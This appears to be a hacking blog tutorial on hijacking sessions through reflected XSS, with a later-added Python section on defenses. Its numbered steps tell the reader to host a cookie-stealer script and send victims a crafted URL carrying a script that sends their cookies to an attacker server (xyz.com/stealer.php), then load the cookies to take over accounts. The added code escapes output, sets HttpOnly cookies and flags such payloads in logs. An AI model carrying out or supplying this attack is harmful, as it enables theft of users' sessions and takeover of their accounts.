Session Hijacking using XSS

Session Hijacking

Session hijacking can be defined as impersonating another user and sending requests as that user.
In layman's terms, it is similar to plane hijacking, where a terrorist takes control of the plane, except that here the hacker takes control of the session. It can be done in many ways, the most common being stealing a user's cookies.

Procedure

1) Find a website that is vulnerable to XSS. Let us assume that the site abc.com is vulnerable to XSS.

2) Assume that when a search (which is vulnerable to XSS) is performed on the website, the parameters are passed in the URL in the format http://abc.com/?s=hello

3) Now we need to save the user's cookies.

4) Copy the code from my repository at https://github.com/rohankalra97/Session-Hijacking/blob/master/stealer.php and save it as stealer.php

5) Replace the 5th line with the URL to which you want the user to be finally redirected.

6) Create an empty file named log.txt.

7) Now upload the files to your own server. Let us assume that the server you uploaded them to is xyz.com.

8) Now, to steal the cookies, we need to edit the search URL and add the following script to it:
<script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>

9) Now we need to send the user the URL for abc.com with the script added:
http://abc.com/?s=<script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>

10) On opening the URL, the user will be redirected to xyz.com, the cookies will be stored in log.txt, and the user will then be redirected to the URL you wrote in step 5.

11) On loading those cookies into your browser, you will get access to that user's account.
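To show the defensive side of the same procedure, here is an added example in Python (not part of the original post or of the linked repository): it reflects the ?s= parameter the way the vulnerable search does and the way a fixed one should (HTML-encoding it), builds a session cookie with the HttpOnly flag so document.cookie cannot read it even if a script runs, and flags the cookie-theft request form from step 9 in constructed access-log lines. The PHPSESSID cookie name, the page template and the log lines are assumptions.

```python
import html
import re
from http.cookies import SimpleCookie
from urllib.parse import unquote

# The payload form the write-up places in the ?s= parameter (taken from the text).
PAYLOAD = ("<script>location.href = 'http://xyz.com/stealer.php?cookie='"
           "+document.cookie;</script>")

def render_search_vulnerable(term):
    """Reflects the search term verbatim: the XSS sink the procedure relies on."""
    return f"<p>Results for: {term}</p>"

def render_search_fixed(term):
    """Encodes the term for an HTML text context; <script> is rendered as text."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"

def session_cookie_header(session_id, hardened=True):
    """Builds the Set-Cookie line for a PHP-style session cookie (name assumed).
    With hardened=True it carries HttpOnly (document.cookie cannot read it),
    Secure and SameSite=Lax."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    if hardened:
        jar["PHPSESSID"]["httponly"] = True
        jar["PHPSESSID"]["secure"] = True
        jar["PHPSESSID"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")

# Strings that the cookie-theft request from step 9 would leave in a web server log.
SUSPICIOUS = re.compile(r"<script|document\.cookie|location\.href", re.IGNORECASE)

def flag_reflected_xss(log_lines):
    """Returns the log lines whose URL-decoded request target matches SUSPICIOUS."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and SUSPICIOUS.search(unquote(m.group(1))):
            hits.append(line)
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /?s=hello HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:07 +0000] "GET /?s=%3Cscript%3Elocation.href%3D%27http%3A%2F%2Fxyz.com%2Fstealer.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 840',
]
```

Run `render_search_fixed(PAYLOAD)` and `flag_reflected_xss(SAMPLE_LOG)` to see the encoded output and the one flagged line.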

Always remember to use Kali for helpful purposes and not use it to cause harm.
Stay Safe.

Follow us on Facebook:- Facebook.com/VAPTHacker
